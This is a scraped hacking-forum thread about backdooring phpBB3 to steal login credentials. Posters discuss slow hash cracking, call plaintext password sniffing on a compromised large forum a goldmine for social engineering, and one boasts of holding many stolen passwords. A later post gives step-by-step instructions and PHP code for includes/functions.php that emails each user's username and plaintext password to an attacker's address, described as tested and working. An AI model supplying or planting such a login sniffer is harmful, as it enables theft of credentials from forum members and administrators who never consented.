 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
phpbb3 send admin log |
 |
 Posted: Sun Dec 30, 2007 12:34 am |
 |
|
| JustinX32 |
| Beginner |
 |
|
| Joined: Dec 30, 2007 |
| Posts: 3 |
|
|
|
 |
|
 |
|
| Is there a way to modify some files in phpbb3 to send admin login details to a specific email? (If the Admin logs in to the Administration Panel) |
|
|
|
|
| Posted: Sun Dec 30, 2007 9:09 am |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Dec 30, 2007 11:35 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Koko: starting from phpbb 3.0.RC7 they are using superoverkill hashing algorithm:
http://www.waraxe.us/ftopict-2021-phpbb3.html
It's something like 2048 times md5, so hash cracking speed will be crippled to lowest levels ...
No rainbow tables .... even wordlist method will be SLOW ...
And as cookie crafting for phpbb >=3.0.RC7 for hash reuse is not working either (my guess), then plaintext password stealing is best option, if we allready have php level access and are interested in passwords (social engineering ...). |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 30, 2007 1:35 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| waraxe wrote: |
Koko: starting from phpbb 3.0.RC7 they are using superoverkill hashing algorithm:
http://www.waraxe.us/ftopict-2021-phpbb3.html
It's something like 2048 times md5, so hash cracking speed will be crippled to lowest levels ...
No rainbow tables .... even wordlist method will be SLOW ...
And as cookie crafting for phpbb >=3.0.RC7 for hash reuse is not working either (my guess), then plaintext password stealing is best option, if we allready have php level access and are interested in passwords (social engineering ...). |
Yep i hear about it.Well we have shiffer to vBulletin,now we nead write to phpBB3.But if you have some other access to server i don't see reasons to still passwords. |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 30, 2007 2:29 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Why not? Let's assume, that you have hacked in to some BIG forum and there are thousands of members. Now, you set up login sniffer and all people, who log in, will reveal their plaintext passwords. Thousands people ...
Now you can cross reference them with emails, ICQ, possible IP's, etc from database.
This is goldmine for social engineers, just think about community members with gov or mil TLD emails ... And think about human factor and laziness  |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 30, 2007 2:44 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| waraxe wrote: | Why not? Let's assume, that you have hacked in to some BIG forum and there are thousands of members. Now, you set up login sniffer and all people, who log in, will reveal their plaintext passwords. Thousands people ...
Now you can cross reference them with emails, ICQ, possible IP's, etc from database.
This is goldmine for social engineers, just think about community members with gov or mil TLD emails ... And think about human factor and laziness |
I have ton's of plaintext passwords from boards,sites etc but is too much work for one person to check all this passwords. |
|
|
|
|
| Posted: Sun Dec 30, 2007 8:49 pm |
|
|
| JustinX32 |
| Beginner |
|
|
| Joined: Dec 30, 2007 |
| Posts: 3 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon May 05, 2008 2:50 am |
|
|
| JustinX32 |
| Beginner |
|
|
| Joined: Dec 30, 2007 |
| Posts: 3 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon May 05, 2008 7:44 am |
|
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
Someone told you how in that very thread.
| Quote: | Instructions:
1.Open file includes/functions.php in a text editor.
2. Find " $result = $auth->login($username, $password, $autologin, $viewonline, $admin); " (omit quotes)
3. After, add:
| Code: |
$sitename = "domain.tld";
$recipient = 'email@domain.tld';
$subject = 'Password Alert - domain.tld';
$message = "Sitename: $sitename - Username: $username - Password: $password";
mail($recipient, $subject, $message); |
4. Change domain.tld with the domain your using it on.
5. Change email@domain.tld with your email address. |
Tested and working on phpBB 3.0.0 |
|
|
|
|
| Posted: Sun Jun 01, 2008 8:34 pm |
|
|
| kurwamac |
| Regular user |
|
|
| Joined: Jun 01, 2008 |
| Posts: 13 |
|
|
|
|
|
|
|
| anyone have it for vbulletin 3.7? |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 133
Members: 0
Total: 133
